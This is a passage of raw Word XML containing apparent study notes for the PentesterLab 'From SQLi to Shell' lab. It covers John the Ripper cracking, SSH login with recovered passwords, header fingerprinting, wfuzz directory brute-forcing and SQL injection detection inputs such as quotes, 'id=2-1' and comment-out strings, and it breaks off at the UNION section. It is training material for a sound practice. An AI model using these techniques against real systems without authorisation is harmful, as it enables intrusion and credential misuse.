        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax: john hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D74B5A" w14:textId="648BE2F2" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use new found passwords and profiles to ssh remote users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E5CD7" w14:textId="57457E71" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>From SQLi to Shell – PentesterLab</w:t>
      </w:r>
      <w:r w:rsidR="00E42CA7">
        <w:t xml:space="preserve"> – Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B19AD9" w14:textId="6D9EA850" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AABF3A7" w14:textId="4BAB9C04" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Inspecting HTTP Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D35B3" w14:textId="05912756" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>connect to web application using netcat or telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9ECEFB" w14:textId="551B95F4" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. telnet &lt;hostname/ip address&gt; 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54A0B0" w14:textId="1281CC9D" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>send the following request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18935B75" w14:textId="59DDCF63" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D69DDEF" w14:textId="75CC203D" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Host: &lt;hostname/IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FDCBEE" w14:textId="589BBE78" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Retrieve information on the version of PHP and web server used by observing HTTP headers sent back by server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6DDFA" w14:textId="015B6181" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B84E08" w14:textId="61882472" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB1C48" w14:textId="4382F319" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using a Directory Buster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4D6A2" w14:textId="53F4F3AA" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wfuzz can be used to detect directories and pages on the web server using brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77349101" w14:textId="47294BF9" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. python wfuzz.py -c -z file,wordlist/general/big.txt - -hc 404 </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="006D4942">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52AB4B1B" w14:textId="5A199F62" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-c colors output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24046000" w14:textId="55994B27" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-z file,wordlist/general/big.txt tells wfuzz to use big.txt wordlist as dictionary to brute force remote directories name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E50AB4" w14:textId="1501A61F" w:rsidR="006D3235" w:rsidRDefault="006D3235" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -hc 404 tells wfuzz to ignore response if response code is 404 (not found)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4EBE90" w14:textId="466BB93F" w:rsidR="006D3235" w:rsidRDefault="007A6E65" w:rsidP="006D3235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00706111" w:rsidRPr="006D4942">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00706111">
        <w:t xml:space="preserve"> tells wfuzz to replace the word FUZZ in the URL by each value found in the dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE6DE5" w14:textId="31AD8FEA" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wfuzz can also be used to detect PHP script on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76E1D1" w14:textId="79CFB715" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python wfuzz.py -z file -f commons.txt - -hc 404 </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="006D4942">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;/FUZZ.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17008ECD" w14:textId="20B4F8AF" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection and Exploitation of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B510D0" w14:textId="19C08764" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16CCCA" w14:textId="71281249" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL allows the developer to make the following requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29525BDA" w14:textId="1A53912B" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>retrieve with SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F4D8D8" w14:textId="526F3D4D" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>update with UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F8399" w14:textId="723F95C4" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>add with INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C618308" w14:textId="0BF9AC5C" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>delete with DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04560E08" w14:textId="64781C97" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>other operands are available but uncommon in web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDCBC8" w14:textId="5DF5B82E" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>most common is SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7986D" w14:textId="3D2CED0D" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8EDC0B" w14:textId="0D5826E2" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT column1, column2, column3 FROM table1 WHERE column4=’string1’ AND column5=integer1 AND column6=integer2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D85C82" w14:textId="22F83BA2" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>* wildcard is available in some databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281480C8" w14:textId="29A062EB" w:rsidR="00706111" w:rsidRDefault="00706111" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection Based on Integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFA9A4" w14:textId="4F50A1BA" w:rsidR="00706111" w:rsidRDefault="007F1819" w:rsidP="00706111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use of single quote additions in URLs that have $_GET[“id”];, such as say article.php?id=1 being valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63594026" w14:textId="25E69B4D" w:rsidR="007F1819" w:rsidRDefault="007F1819" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>but article.php?id=2’ is invalid because of the single quote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0A33B" w14:textId="4BB46FA1" w:rsidR="007F1819" w:rsidRDefault="007F1819" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm with math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B48D4" w14:textId="35F041DB" w:rsidR="007F1819" w:rsidRDefault="007F1819" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if /article.php?id=2-1 displays the content of id=1, then SQLi has been found, as the server will do the math for the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B4FE4" w14:textId="5F092071" w:rsidR="007F1819" w:rsidRDefault="007F1819" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>however, if this input returns the content of id=2 (ignoring the 2-1), then SQLi via integer is not likely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E667D" w14:textId="4C995FE9" w:rsidR="007F1819" w:rsidRDefault="007F1819" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>string SQLi is still possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3301587E" w14:textId="3B6DFE4C" w:rsidR="007F1819" w:rsidRDefault="007F1819" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection on Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C175D1" w14:textId="1C682470" w:rsidR="007F1819" w:rsidRDefault="002E68B9" w:rsidP="007F1819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>typical string based SQL queries will be as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624AAD29" w14:textId="07AB3A90" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT id,name FROM users where name=’test’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF25AC3" w14:textId="57C1900A" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If SQLi is present, inputting a single quote will break syntax and generate an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFB8D5" w14:textId="36BF6419" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>odd number of single quotes should throw an error, even number should not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676FDAC9" w14:textId="0E0829BF" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can comment out end of queries using ‘ - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A362DBF" w14:textId="60C8243F" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SELECT id,name FROM users where name=’test’ - - ‘ and id =3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79237247" w14:textId="18AE1232" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>is the same as SELECT id,name FROM users where name=’test’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EC1F3" w14:textId="289884BE" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation of SQL Injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2926CA" w14:textId="433B9E90" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The UNION Keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613ECFF4" w14:textId="4BE5C807" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
